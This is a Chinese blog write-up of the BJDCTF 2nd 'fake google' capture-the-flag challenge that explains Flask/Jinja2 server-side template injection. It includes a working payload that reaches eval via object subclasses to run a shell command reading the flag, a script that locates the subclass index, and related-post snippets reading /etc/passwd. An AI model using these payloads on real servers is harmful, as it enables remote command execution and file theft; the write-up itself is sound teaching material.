[BJDCTF 2nd]fake google Writeup(SSTI攻击原理分析)

最新推荐文章于 2023-02-14 11:28:06 发布
最新推荐文章于 2023-02-14 11:28:06 发布
阅读量317 收藏 1
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/StevenOnesir/article/details/110559557
版权

利用本题,我们开始讲解简单的SSTI知识。

首先进入题目界面,发现是一个大大的google搜索界面(仿制)

在这里插入图片描述
在搜索栏随意输入后,发现跳转到qaq,并以get方式传入了一个name的变量。
在这里插入图片描述
在这里插入图片描述
然后我们开始修改name变量的值。
不要因为我说要讲框架注入咱们就直接上SSTI的payload。。。正常测试找攻击点咱们也该试试1’ 之类的sql注入。。。
然后我们发现输入SSTI的表达式构造会出现回显:

?name={{2*2}}

在这里插入图片描述
这里附一张各类框架的结构图(网图):
在这里插入图片描述
漏洞形成的原因其实与sql等大同小异。
关键在于一个函数和一个框架知识。

函数:reder_template
框架知识:框架渲染
render_template函数在渲染模板的时候使用了%s来动态替换字符串(见上方图),替换的过程如果我们输入的是正常的string,那输出正常。但如果我们输入计算表达式甚至代码的话,就能实现注入攻击。
利用的流程一般是先获取基本类,再获取基本类的子类,并从子类中找到关于命令执行的模块。

所以这道题我们的payload:

http://46742af1-6c83-4833-9337-84f7e1e072dd.node3.buuoj.cn/qaq?name={{%27%27.__class__.__bases__[0].__subclasses__()[169].__init__.__globals__.__builtins__[%27eval%27](%22__import__(%27os%27).popen(%27cd%20/;cat%20flag%27).read()%22)}}

这里基本没有任何过滤。

附一个可以自动检测所用类序号的脚本:

import requests
import re
url = r"http://www.example.com?SSTI={{''.__class__.__bases__[0].__subclasses__()}}"
r = requests.get(url)
s = re.findall(r"class '(.*?)'>",r.text)
print(s.index('warnings.catch_warnings')+1)
#print(r.text)

题目难度:

简单

考察点:

SSTI简单注入

StevenOnesir
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
服务端模板注入攻击SSTI
pmt123456的博客
11-17 509
1、题目:Web_python_template_injection 从零学习flask模板注入 关于python魔术方法payload:"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() 的解释 题解1:CTF引出对Python模板注入的思考 #找到os模块 #有两个 #我们要找的是第71个<class 'site._Printer'> num = 0 for n in ''.__class__.__m
2022 Hvv 第一起供应链攻击fake_useragant分析材料
08-01
请放到沙箱里分析,具体分析过程参考我的博客: https://blog.csdn.net/leeezp/article/details/125973780
[BJDCTF 2nd]fake google
kuller_Yan的博客
06-13 326
[BJDCTF 2nd]fake google wp from Kuller_Yan 先打开靶机: 测试是否存在ssti注入{{1+1}} 进行查询{{''.__class__}} next{{''.__class__.__bases__}} next:{{''.__class__.__bases__[0].__subclasses__()}} 找到第169个{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['
fake-gcs-server:Google Cloud Storage模拟器和测试库
02-04
fake-gcs-server为Google Cloud Storage API提供了一个模拟器。 它可以用作Go项目中的库和/或独立的二进制/ Docker映像。 该库位于包中,可以在Go包的测试套件中使用。 该仿真器作为二进制文件提供,可以手动构建...
fake_google_login-master_login_html_login-master_fake_google_
10-01
在这个名为 "fake_google_login-master_login_html_login-master_fake_google_" 的项目中,我们主要探讨的是创建一个仿冒的谷歌登录网页。这个项目对于学习HTML、CSS和JavaScript基础,以及理解网络钓鱼攻击的防范...
FakeApp2.2+core文件共1.4G
09-04
FakeApp2.2+core文件共1.4G
json fake_useragent fake_useragent
06-24
fake_useragent json缓存 爬虫 fake 消息头
[BJDCTF 2nd]fake google -wp
freerats的博客
06-29 233
打开后一个google搜索框,查看源码没什么,随便输入点东西搜索 查看源码,提示ssti 测试一下,存在ssti 1 、获取字符串的类对象 ''.__class__ 2 、寻找基类 ''.__class__.__mro__ 3 、寻找可用引用 ''.__class__.__mro__[1].__subclasses__() 在最后面发现模块引擎类型 <class ‘jinja2.ext.Extension’>, <class ‘jinja2.ext._CommentFinder’
[BJDCTF 2nd]fake google 1
weixin_45674567的博客
04-22 512
参考文章https://blog.csdn.net/u011377996/article/details/86776181 确定模块注入: 具体网址内容: http://abcfb0f6-5bad-49f4-aadd-115d99530dba.node3.buuoj.cn/qaq?name={%%20for%20c%20in%20[].class.base.subclasses()%20%...
BUUCTF__[BJDCTF 2nd]fake google_题解
风过江南乱的博客
07-16 752
SSTI/沙盒逃逸详细总结 SSTI模板注入 服务端模板注入攻击
[BJDCTF 2nd] web题-fake google
BROTHERYY的博客
07-09 220
复现环境:buuoj.cn 根据提示知道是ssti模板注入,使用tplmap进行注入。 发现存在代码执行 tplmap在github上下载,好像只能用py2运行,我在py3运行会报错 查看flag flag{9d83b5bd-72fd-468e-93a6-90237a167245}
mysql xpath注入_服务端模板注入攻击 (SSTI) 之浅析
weixin_39895977的博客
02-07 225
Author: RickGray (知道创宇404安全实验室)在今年的黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍。本文在理解原文内容的基础上,结合更为具体的示例对服务端模板注入的原理和扫描检测方法做一个浅析。一、模板...
SSTI漏洞原理及渗透测试
二狗的博客
02-14 568
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
SSTI原理以及ctf.show的SSTI(web361-web362)
wanan的博客
09-30 711
SSTI原理以及ctf.show的SSTI(web361-web362)
初识SSTI(服务端模板注入攻击)
weixin_44866139的博客
05-06 1957
一、模板引擎(SST) 百度百科: 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。 原理: 模板引擎的实现方式有很多,最简单的是“置换型”模板引擎,这类模板引擎只是将指定模板内容(字符串)中的特定标记(子字符串)替换一下便生成了最终需要的业务数据(比如网页)。 置换型模板...
deepfake技术原理
最新发布
11-22
Deepfake技术是一种基于深度学习的人脸合成技术,其原理主要包括以下三个方面: 1. 数据提取和预处理:Deepfake需要大量的人脸数据来进行训练,这些数据需要从互联网上搜集并进行筛选和预处理。预处理包括对人脸...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值